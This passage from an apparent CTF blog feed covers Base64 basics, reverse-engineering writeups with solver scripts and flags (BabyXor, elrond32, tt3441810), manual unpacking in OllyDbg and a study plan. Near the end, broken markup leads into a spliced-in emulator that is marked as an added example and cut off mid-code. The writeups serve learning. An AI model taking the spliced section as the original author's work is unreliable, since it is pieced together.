align="center">4</td></tr><tr><td align="center">9</td><td align="center">J</td><td align="center">25</td><td align="center">Z</td><td align="center">41</td><td align="center">p</td><td align="center">57</td><td align="center">5</td></tr><tr><td align="center">10</td><td align="center">K</td><td align="center">26</td><td align="center">a</td><td align="center">42</td><td align="center">q</td><td align="center">58</td><td align="center">6</td></tr><tr><td align="center">11</td><td align="center">L</td><td align="center">27</td><td align="center">b</td><td align="center">43</td><td align="center">r</td><td align="center">59</td><td align="center">7</td></tr><tr><td align="center">12</td><td align="center">M</td><td align="center">28</td><td align="center">c</td><td align="center">44</td><td align="center">s</td><td align="center">60</td><td align="center">8</td></tr><tr><td align="center">13</td><td align="center">N</td><td align="center">29</td><td align="center">d</td><td align="center">45</td><td align="center">t</td><td align="center">61</td><td align="center">9</td></tr><tr><td align="center">14</td><td align="center">O</td><td align="center">30</td><td align="center">e</td><td align="center">46</td><td align="center">u</td><td align="center">62</td><td align="center">+</td></tr><tr><td align="center">15</td><td align="center">P</td><td align="center">31</td><td align="center">f</td><td align="center">47</td><td align="center">v</td><td align="center">63</td><td align="center">/</td></tr></tbody></table><p>The overall process: convert the text to ASCII codes, write each code as 8 binary bits, take the bits 6 at a time to get decimal indices, and map each index through the table to a character.</p><p>If the number of bytes to encode is not divisible by 3, 1 or 2 bytes are left over at the end. They are handled as follows: pad the end with zero-valued bytes until the length is divisible by 3, then Base64-encode as usual, and append one or two <code>=</code> signs to the encoded text to record how many bytes were padded. That is, when two bytes (16 bits) remain, the last 6-bit Base64 block has two zero-valued bits and one equals sign is appended; when one byte (8 bits) remains, the last 6-bit block has four zero-valued bits and two equals signs are appended.</p><h3 id="base64解码"><a href="#base64解码" class="headerlink" title="base64解码"></a>Base64 decoding</h3><p><a href="http://tool.chinaz.com/Tools/Base64.aspx" target="_blank" rel="noopener">Online encode/decode tool</a></p><h3 id="base64-python"><a href="#base64-python" class="headerlink" title="base64_python"></a>base64_python</h3><h4 id="想将字符串转编码成base64-要先将字符串转换成二进制数据"><a href="#想将字符串转编码成base64-要先将字符串转换成二进制数据" class="headerlink" title="想将字符串转编码成base64,要先将字符串转换成二进制数据"></a>To Base64-encode a string, first convert it to binary data (bytes)</h4><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="code"><pre><span class="line">import base64</span><br><span class="line">url = "https://www.cnblogs.com/songzhixue/"</span><br><span class="line">bytes_url = url.encode("utf-8")</span><br><span class="line">str_url = base64.b64encode(bytes_url)  # the argument must be bytes, not str</span><br><span class="line">print(str_url)</span><br><span class="line"></span><br><span class="line"># output: b'aHR0cHM6Ly93d3cuY25ibG9ncy5jb20vc29uZ3poaXh1ZS8='</span><br></pre></td></tr></table></figure></div><h4 id="将base64解码成字符串"><a href="#将base64解码成字符串" class="headerlink" title="将base64解码成字符串"></a>Decoding Base64 back into a string</h4><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="code"><pre><span class="line">import base64</span><br><span class="line">url = "aHR0cHM6Ly93d3cuY25ibG9ncy5jb20vc29uZ3poaXh1ZS8="</span><br><span class="line">str_url = base64.b64decode(url).decode("utf-8")  # b64decode returns bytes; decode them to str</span><br><span class="line">print(str_url)</span><br><span class="line"></span><br><span class="line"># output: https://www.cnblogs.com/songzhixue/</span><br></pre></td></tr></table></figure></div>]]></content>
<summary type="html">
<p>转载自海里大佬!</p>
</summary>
<category term="CTF" scheme="https://github.com/gha01un/gha01un.github.io/categories/CTF/"/>
<category term="RE" scheme="https://github.com/gha01un/gha01un.github.io/tags/RE/"/>
</entry>
<entry>
<title>BabyXor&OD手动脱壳</title>
<link href="https://github.com/gha01un/gha01un.github.io/2020/12/10/BabyXor&OD%E6%89%8B%E5%8A%A8%E8%84%B1%E5%A3%B3/"/>
<id>https://github.com/gha01un/gha01un.github.io/2020/12/10/BabyXor&OD%E6%89%8B%E5%8A%A8%E8%84%B1%E5%A3%B3/</id>
<published>2020-12-10T08:42:49.781Z</published>
<updated>2021-01-11T01:42:17.969Z</updated>
<content type="html"><![CDATA[<p>The challenge itself is routine, but I learned some things about manual unpacking.</p><a id="more"></a><h3 id="脱壳过程"><a href="#脱壳过程" class="headerlink" title="脱壳过程"></a>Unpacking</h3><p>Inspecting the file shows a packer I did not recognise, so we unpack it by hand in OllyDbg (OD).</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/10/zN8M6BDTdcQ9qnm.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>Load the file into OD.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/10/jeLRZWtk1Ji3yTU.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>Here we use the ESP trick; the concrete steps of ESP-based unpacking are as follows.</p><p>The ESP law (ESP is shown in OD's register pane; setting a hardware access breakpoint on the ESP value from the command line brings us straight to the program's OEP):</p><p>(1) Press F8 right at the start and watch whether ESP in the register pane at the top right of OD lights up (turns red). (This is only the usual case; more precisely, the ESP value we pick is the first ESP value after the key instruction.)</p><p>(2) In the command line enter <code>dd XXXXXXXX</code> (the ESP address in the current code; <code>hr XXXXXXXX</code> also works) and press Enter.</p><p>(3) Select the address to break on, then Breakpoint -> Hardware, on access -> Word.</p><p>(4) Press F9 to run the program; it stops right at the jump. Press F8 to reach the program's OEP.</p><p>Press F8 to step over once; ESP is now red. Note the value in the ESP register, 0019FF54 (the ESP right after the program's load point turns red; of course the value may differ on other machines).</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/10/aUH4XvfgsziRWxD.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>In the command line type <code>dd 0019FF54</code> and press Enter.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/10/jduGTcb6fvitU2D.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>Select the 0019FF54 row to break on, then choose Breakpoint -> Hardware, on access -> Word.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/10/1lWQXfnNxHJzvRU.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>The hardware breakpoint we set is listed under Debug (D) -> Hardware breakpoints (H) in the menu bar.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/10/aH1pMEPU8bZIQwg.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>Press F9 to run, then single-step with F8. When we reach the big jump, stop pressing F8 (it jumps upwards); we have to follow this jump, because what comes next is probably the program's own OEP territory.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/10/8qucbXtQJmy5wKH.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/10/n73SbGkKf8iYOhV.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>More material on the ESP law:</p><p><code>https://blog.csdn.net/qiurisuixiang/article/details/7649799</code></p><p><code>https://beikeit.com/post-614.html</code></p><h3 id="静态分析"><a href="#静态分析" class="headerlink" title="静态分析"></a>Static analysis</h3><p>Load the unpacked exe into IDA.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/10/4JNp1coPiFdHIaE.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>Start with the important function:</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="C"><figure class="iseeu highlight /c"><table><tr><td class="code"><pre><span class="line">v1 = sub_40108C((int)&unk_435DC0, <span class="number">56</span>);</span><br><span class="line">v2 = (char *)sub_401041((int)&unk_435DC0, (int)&dword_435DF8, <span class="number">0x38</span>u);</span><br><span class="line">v3 = malloc(<span class="number">0x64</span>u);</span><br><span class="line">v4 = strlen(v2);</span><br><span class="line">memcpy(v3, v2, v4);</span><br><span class="line">v5 = sub_4010C3(&unk_435DC0, v2, &dword_435E30, <span class="number">56</span>);</span><br><span class="line">sub_40101E(v1, v2, v5);</span><br></pre></td></tr></table></figure></div><p>For these functions, look at the arguments first and work out how they relate to each other.</p><p>Look at <code>&unk_435DC0</code></p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/10/NKkzeQyIULaitJE.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>This is clearly an array. Before going further, a note for fellow beginners on how to read off the values:<br>1. Check the type: here it is dd, i.e. 4 bytes each, so the data is split into 4-byte units<br>2. Check the addresses: in the screenshot the values are split address by address<br>3. Check the byte order: little-endian (high to low) versus big-endian (low to high)<br>From these three points we get</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="code"><pre><span class="line">435DC0=[0x66,0x6d,0x63,0x64,0x7f,0x37,0x35,0x30,0x30,0x6b,0x3a,0x3c,0x3b,0x20]</span><br></pre></td></tr></table></figure></div><p>Look at <code>&dword_435DF8</code></p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/10/FUoj5SqeuXcrDEY.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="code"><pre><span class="line">435DF8=[0x37,0x6f,0x38,0x62,0x36,0x7c,0x37,0x33,0x34,0x76,0x33,0x62,0x64,0x7a]</span><br></pre></td></tr></table></figure></div><p>Look at <code>dword_435E30</code><br>which gives</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="code"><pre><span class="line">435E30=[0x1a,0,0,0x51,0x5,0x11,0x54,0x56,0x55,0x59,0x1d,0x9,0x5d,0x12,0,0]</span><br></pre></td></tr></table></figure></div><p>With the data extracted, we look at the logic.</p><p>The <code>sub_40108C</code> function</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/10/MY9mkrbaZWs81Ul.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>As code:</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="C"><figure class="iseeu highlight /c"><table><tr><td class="code"><pre><span class="line">// sub_40108C(a1 = &unk_435DC0, a2 = 56): XOR the low byte of each dword with its index</span><br><span class="line">char *sub_40108C(const unsigned char *a1, int a2)</span><br><span class="line">{</span><br><span class="line">    int n = a2 >> 2;                 // 56 >> 2 = 14 characters</span><br><span class="line">    char *v3 = malloc(n + 1);</span><br><span class="line">    for (int i = 0; i < n; ++i)</span><br><span class="line">        sprintf(&v3[i], "%c", i ^ a1[4 * i]);   // one byte per dword, hence the stride of 4</span><br><span class="line">    return v3;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">// a1 = [102, 109, 99, 100, 127, 55, 53, 48, 48, 107, 58, 60, 59, 32]</span><br></pre></td></tr></table></figure></div><p>Solving this function</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line">a1 = [102, 109, 99, 100, 127, 55, 53, 48, 48, 107, 58, 60, 59, 32]</span><br><span class="line">flag = ''</span><br><span class="line">for i in range(14):</span><br><span class="line">    flag += chr(a1[i] ^ i)</span><br></pre></td></tr></table></figure></div><p>The <code>sub_401041((int)&unk_435DC0, (int)&dword_435DF8, 0x38u)</code> function</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/10/4l3cADT1dm5uwNH.png" alt="image-20201210173449644" title=""> </div> <div class="image-caption">image-20201210173449644</div> </figure><p>As code</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="C"><figure class="iseeu highlight /c"><table><tr><td class="code"><pre><span class="line">// sub_401041(a1 = &unk_435DC0, a2 = &dword_435DF8, a3 = 0x38): chain each byte with its predecessor</span><br><span class="line">char *sub_401041(const unsigned char *a1, const unsigned char *a2, unsigned int a3)</span><br><span class="line">{</span><br><span class="line">    char *v5 = malloc(a3);</span><br><span class="line">    sprintf(&v5[0], "%c", a2[0]);    // the first byte is copied through unchanged</span><br><span class="line">    for (int i = 1; i < 14; ++i)</span><br><span class="line">        sprintf(&v5[i], "%c", a1[4 * i] ^ a2[4 * i] ^ a1[4 * i - 4]);</span><br><span class="line">    return v5;</span><br><span class="line">}</span><br></pre></td></tr></table></figure></div><p>Solving this function</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line">a2 = [55, 111, 56, 98, 54, 124, 55, 51, 52, 118, 51, 98, 100, 122]</span><br><span class="line">temp = []</span><br><span class="line">flag += chr(a2[0])</span><br><span class="line">temp.append(a2[0])</span><br><span class="line">for i in range(1, 14):</span><br><span class="line">    x = (a1[i] ^ a2[i] ^ a1[i - 1])</span><br><span class="line">    flag += chr(x)</span><br><span class="line">    temp.append(x)</span><br></pre></td></tr></table></figure></div><p>The last function, <code>sub_4010C3((int)&unk_435DC0, (int)v3, (int)&dword_435E30, 56)</code></p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/10/fcPpmRa38nCUE4k.png" alt="image-20201210173723720" title=""> </div> <div class="image-caption">image-20201210173723720</div> </figure><p>Solving the function</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line">a3 = [26, 0, 0, 81, 5, 17, 84, 86, 85, 89, 29, 9, 93, 18, 0, 0]</span><br><span class="line"></span><br><span class="line">x = ''</span><br><span class="line">for i in range(13):</span><br><span class="line">    x += chr(a3[i + 1] ^ temp[i] ^ i)</span><br><span class="line"></span><br><span class="line">flag += chr(a3[0] ^ a2[0]) + x   # byte 0 is not chained; the rest come from temp</span><br></pre></td></tr></table></figure></div><p>The complete exp</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line">a1 = [<span class="number">102</span>, <span class="number">109</span>, <span class="number">99</span>, <span class="number">100</span>, <span class="number">127</span>, <span class="number">55</span>, <span class="number">53</span>, <span class="number">48</span>, <span class="number">48</span>, <span class="number">107</span>, <span class="number">58</span>, <span class="number">60</span>, <span class="number">59</span>, <span class="number">32</span> ]</span><br><span class="line">a2 = [<span class="number">55</span>, <span class="number">111</span>, <span class="number">56</span>, <span class="number">98</span>, <span class="number">54</span>, <span class="number">124</span>, <span class="number">55</span>, <span class="number">51</span>, <span class="number">52</span>, <span class="number">118</span>, <span class="number">51</span>, <span class="number">98</span>, <span class="number">100</span>, <span class="number">122</span>]</span><br><span class="line">a3 = [<span class="number">26</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">81</span>,<span class="number">5</span>,<span class="number">17</span>,<span class="number">84</span>,<span class="number">86</span>,<span class="number">85</span>,<span class="number">89</span>,<span class="number">29</span>,<span 
class="number">9</span>,<span class="number">93</span>,<span class="number">18</span>,<span class="number">0</span>,<span class="number">0</span>]</span><br><span class="line">temp=[]</span><br><span class="line">flag=<span class="string">''</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">14</span>):</span><br><span class="line"> flag+=chr(a1[i]^i)</span><br><span class="line"></span><br><span class="line">flag+=chr(a2[<span class="number">0</span>])</span><br><span class="line">temp.append(a2[<span class="number">0</span>])</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">1</span>,<span class="number">14</span>):</span><br><span class="line"> x=a1[i]^a2[i]^a1[i<span class="number">-1</span>]</span><br><span class="line"> flag+=chr(x)</span><br><span class="line"> temp.append(x)</span><br><span class="line"></span><br><span class="line">x=<span class="string">''</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">13</span>):</span><br><span class="line"> x+=chr(a3[i+<span class="number">1</span>]^(temp[i])^i)</span><br><span class="line">flag+= chr(a3[<span class="number">0</span>] ^ a2[<span class="number">0</span>]) + x</span><br><span class="line">print(flag)</span><br><span class="line"></span><br><span class="line"><span class="comment"># flag{2378b077-7d6e-4564-bdca-7eec8eede9a2}</span></span><br></pre></td></tr></table></figure></div><h3 id="动态分析"><a href="#动态分析" class="headerlink" title="动态分析"></a>动态分析</h3><p>其实也可以用动态调试的方法做,在三个函数的位置分别下断点</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/10/jiKHz9TbvAPLtEO.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><figure class="image-bubble"> <div class="img-lightbox"> <div 
class="overlay"></div> <img src="https://i.loli.net/2020/12/10/udED4eAzTQyn8cb.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/10/3nGJAiYTKLb1ePa.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>把得到的flag拼凑到一起即为答案。</p><p>刚刚发现自己脱壳出来的exe文件无法在od里动调,所以我试不了这种方法,图是偷的别人的。至于为什么动调不了等我回去问问大佬们吧。心态有一点小炸裂,无语凝噎!!!</p>]]></content>
<summary type="html">
<p>A routine challenge, but I learned a few things about manual unpacking.</p>
</summary>
<category term="CTF" scheme="https://github.com/gha01un/gha01un.github.io/categories/CTF/"/>
<category term="RE" scheme="https://github.com/gha01un/gha01un.github.io/tags/RE/"/>
</entry>
<entry>
<title>Plan for the time before the winter break</title>
<link href="https://github.com/gha01un/gha01un.github.io/2020/12/02/%E5%AF%92%E5%81%87%E4%B9%8B%E5%89%8D%E7%9A%84%E8%AE%A1%E5%88%92/"/>
<id>https://github.com/gha01un/gha01un.github.io/2020/12/02/%E5%AF%92%E5%81%87%E4%B9%8B%E5%89%8D%E7%9A%84%E8%AE%A1%E5%88%92/</id>
<published>2020-12-02T09:07:38.653Z</published>
<updated>2020-12-02T09:17:54.019Z</updated>
<content type="html"><![CDATA[<p>Take this seriously!</p><a id="more"></a><ul><li>Study cryptography and the network security textbook properly; reproduce the network security and cryptography lab exercises carefully</li><li>Get familiar with basic Java syntax and strengthen my Python coding</li><li>Settle on a plan for the graduate entrance exam</li><li>Study English seriously; keep memorizing vocabulary and doing practice questions</li><li>Spend less time on CTF (no CTF study in my spare time before the winter break)</li><li>Start getting into pwn after the winter break</li><li>Drink less and go out partying less</li></ul>]]></content>
<summary type="html">
<p>Take this seriously!</p>
</summary>
<category term="Miscellaneous" scheme="https://github.com/gha01un/gha01un.github.io/categories/%E6%9D%82%E8%B0%88/"/>
<category term="plan" scheme="https://github.com/gha01un/gha01un.github.io/tags/plan/"/>
</entry>
<entry>
<title>XCTF advanced section</title>
<link href="https://github.com/gha01un/gha01un.github.io/2020/12/01/XCTF%E9%AB%98%E6%89%8B%E5%8C%BA/"/>
<id>https://github.com/gha01un/gha01un.github.io/2020/12/01/XCTF%E9%AB%98%E6%89%8B%E5%8C%BA/</id>
<published>2020-12-01T06:36:35.240Z</published>
<updated>2021-01-11T01:42:51.158Z</updated>
<content type="html"><![CDATA[<p>Killing time in lab class again!</p><a id="more"></a><p>I am almost through the second page of the XCTF reverse engineering advanced section, so let me use lab class to catch up on the writeups.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/01/bJN1qua8BT7ZoQU.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><h3 id="elrond32"><a href="#elrond32" class="headerlink" title="elrond32"></a>elrond32</h3><p>Load it into IDA and look at the main function.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/01/1XKgsRHWxOdUJlT.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>The string Access granted makes it obvious that sub_8048538() is the function that prints the flag, so open it up.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/01/fbkSXxUCZ3qDNre.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>From the code we need the contents of the array a2, so go back to main: a2 is produced through sub_8048414(), so open that as well.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/01/VL6hPGlkgJOniCS.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>Analyze the function and write out the corresponding code!</p><p>Continuing with sub_8048538(), we also need the contents of the v2 array. From the line</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="code"><pre><span class="line">qmemcpy(v2, &unk_8048760, sizeof(v2));</span><br></pre></td></tr></table></figure></div><p>we know that v2 is 33 ints copied from unk_8048760.<br>Look at the values at unk_8048760:</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/01/rc7Qq3TVMxEvPYg.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p><strong>Each int occupies 4 bytes and only the low byte of each holds a value; the other 3 bytes are zero padding.</strong> Taking one byte per dword gives</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" 
contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line">data=[<span class="number">0x0F</span>,<span class="number">0x1F</span>,<span class="number">0x04</span>,<span class="number">0x09</span>,<span class="number">0x1C</span>,<span class="number">0x12</span>,<span class="number">0x42</span>,<span class="number">0x09</span>,<span class="number">0x0C</span>,<span class="number">0x44</span>,<span class="number">0x0D</span>,<span class="number">0x07</span>,<span class="number">0x09</span>,<span class="number">0x06</span>,<span class="number">0x2D</span>,<span class="number">0x37</span>,<span class="number">0x59</span>,<span class="number">0x1E</span>,<span class="number">0x00</span>,<span class="number">0x59</span>,<span class="number">0x0F</span>,<span class="number">0x08</span>,<span class="number">0x1C</span>,<span class="number">0x23</span>,<span class="number">0x36</span>,<span class="number">0x07</span>,<span class="number">0x55</span>,<span class="number">0x02</span>,<span class="number">0x0C</span>,<span class="number">0x08</span>,<span class="number">0x41</span>,<span class="number">0x0A</span>,<span class="number">0x14</span>]</span><br></pre></td></tr></table></figure></div><p>Writing the script gives the flag:</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line">a=<span class="string">'ie ndags r'</span>  <span class="comment"># scrambled key bytes as laid out in the binary</span></span><br><span class="line">x=<span class="number">0</span></span><br><span class="line">s=[]</span><br><span class="line"><span class="comment"># walk the same index sequence as the recursive check in sub_8048414: next index = 7*(x+1) % 11</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">9</span>):</span><br><span class="line">    x=<span class="number">7</span>*x%<span class="number">11</span></span><br><span class="line">    s.append(a[x])</span><br><span class="line">    x+=<span 
class="number">1</span></span><br><span class="line">print(<span class="string">''</span>.join(s))  <span class="comment"># the recovered key</span></span><br><span class="line">data=[<span class="number">0x0F</span>,<span class="number">0x1F</span>,<span class="number">0x04</span>,<span class="number">0x09</span>,<span class="number">0x1C</span>,<span class="number">0x12</span>,<span class="number">0x42</span>,<span class="number">0x09</span>,<span class="number">0x0C</span>,<span class="number">0x44</span>,<span class="number">0x0D</span>,<span class="number">0x07</span>,<span class="number">0x09</span>,<span class="number">0x06</span>,<span class="number">0x2D</span>,<span class="number">0x37</span>,<span class="number">0x59</span>,<span class="number">0x1E</span>,<span class="number">0x00</span>,<span class="number">0x59</span>,<span class="number">0x0F</span>,<span class="number">0x08</span>,<span class="number">0x1C</span>,<span class="number">0x23</span>,<span class="number">0x36</span>,<span class="number">0x07</span>,<span class="number">0x55</span>,<span class="number">0x02</span>,<span class="number">0x0C</span>,<span class="number">0x08</span>,<span class="number">0x41</span>,<span class="number">0x0A</span>,<span class="number">0x14</span>]</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">33</span>):</span><br><span class="line">    print(chr(ord(s[i%<span class="number">8</span>])^data[i]),end=<span class="string">''</span>)  <span class="comment"># flag byte i = data[i] ^ key[i % 8]</span></span><br></pre></td></tr></table></figure></div><h3 id="tt3441810"><a href="#tt3441810" class="headerlink" title="tt3441810"></a>tt3441810</h3><p>This one is not really a reverse engineering challenge at all.</p><p>Open it in 010 Editor.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/01/GqYQuOnfXgdxVBm.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>The file's hex, read as ASCII, is itself another run of hex digits, so we convert that hex to ASCII as well.</p><p>The output looks strange: HH4$HH keeps repeating. That is the printable residue of x86-64 instruction bytes. Each group is a <code>push</code> (opcode 0x68, the letter h) of two flag characters followed by the fixed sequence 48 BF .. 48 8D 34 24 48 BA .. 48 B8 .. 0F 05, which is <code>write(1, rsp, 2)</code>; the file is machine code that prints the flag two characters at a time.</p><div class="highlight-wrap"autocomplete="off" 
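><p>Since the bytes are machine code, they can simply be executed instead of filtered. The following Python emulator is an added example and is not part of the original writeup: it decodes only the instruction forms that occur in this dump (<code>push imm32</code>, <code>mov r64, imm64</code>, <code>lea rsi, [rsp]</code>, <code>xor rdi, rdi</code> and <code>syscall</code>), keeps a small emulated stack, and replays the Linux <code>write</code> and <code>exit</code> system calls, so it recovers exactly the bytes the kernel would have printed. The only input is the byte dump of the challenge file as transcribed from the writeup's own list; any opcode outside that set raises an error rather than being skipped.</p>
<pre>
```python
# Added example: a minimal x86-64 emulator for the tt3441810 dump.
# DUMP is the challenge file as transcribed from the writeup's byte list (343 bytes).
DUMP = bytes.fromhex("""
68 66 6C 00 00 48 BF 01 00 00 00 00 00 00 00 48
8D 34 24 48 BA 02 00 00 00 00 00 00 00 48 B8 01
00 00 00 00 00 00 00 0F 05 68 61 67 00 00 48 BF
01 00 00 00 00 00 00 00 48 8D 34 24 48 BA 02 00
00 00 00 00 00 00 48 B8 01 00 00 00 00 00 00 00
0F 05 68 7B 70 00 00 48 BF 01 00 00 00 00 00 00
00 48 8D 34 24 48 BA 02 00 00 00 00 00 00 00 48
B8 01 00 00 00 00 00 00 00 0F 05 68 6F 70 00 00
48 BF 01 00 00 00 00 00 00 00 48 8D 34 24 48 BA
02 00 00 00 00 00 00 00 48 B8 01 00 00 00 00 00
00 00 0F 05 68 70 6F 00 00 48 BF 01 00 00 00 00
00 00 00 48 8D 34 24 48 BA 02 00 00 00 00 00 00
00 48 B8 01 00 00 00 00 00 00 00 0F 05 68 70 72
00 00 48 BF 01 00 00 00 00 00 00 00 48 8D 34 24
48 BA 02 00 00 00 00 00 00 00 48 B8 01 00 00 00
00 00 00 00 0F 05 68 65 74 00 00 48 BF 01 00 00
00 00 00 00 00 48 8D 34 24 48 BA 02 00 00 00 00
00 00 00 48 B8 01 00 00 00 00 00 00 00 0F 05 68
7D 0A 00 00 48 BF 01 00 00 00 00 00 00 00 48 8D
34 24 48 BA 02 00 00 00 00 00 00 00 48 B8 01 00
00 00 00 00 00 00 0F 05 48 31 FF 48 B8 3C 00 00
00 00 00 00 00 0F 05
""")

# REX.W B8+r encodes "mov r64, imm64"; register order follows the ModRM/opcode numbering.
REG64 = ["rax", "rcx", "rdx", "rbx", "rsp", "rbp", "rsi", "rdi"]
STACK_TOP = 0x1000  # emulated stack occupies addresses [0, STACK_TOP); rsp starts at the top


def emulate(code):
    """Run the shellcode; return (bytes written to fd 1, exit status or None if no exit)."""
    regs = {r: 0 for r in REG64}
    regs["rsp"] = STACK_TOP
    mem = bytearray(STACK_TOP)
    out = bytearray()
    pc = 0
    while pc < len(code):
        op = code[pc]
        if op == 0x68:                                   # push imm32 (sign-extended to 64 bits)
            imm = int.from_bytes(code[pc + 1:pc + 5], "little", signed=True)
            regs["rsp"] -= 8
            mem[regs["rsp"]:regs["rsp"] +  8] = imm.to_bytes(8, "little", signed=True)
            pc += 5
        elif code[pc:pc + 4] == b"\x48\x8d\x34\x24":     # lea rsi, [rsp]
            regs["rsi"] = regs["rsp"]
            pc += 4
        elif code[pc:pc + 3] == b"\x48\x31\xff":         # xor rdi, rdi
            regs["rdi"] = 0
            pc += 3
        elif op == 0x48 and pc + 10 <= len(code) and 0xB8 <= code[pc + 1] <= 0xBF:
            regs[REG64[code[pc + 1] - 0xB8]] = int.from_bytes(code[pc + 2:pc + 10], "little")
            pc += 10                                     # mov r64, imm64
        elif code[pc:pc + 2] == b"\x0f\x05":             # syscall, Linux x86-64 ABI (number in rax)
            nr = regs["rax"]
            if nr == 1 and regs["rdi"] == 1:             # write(1, rsi, rdx): capture stdout
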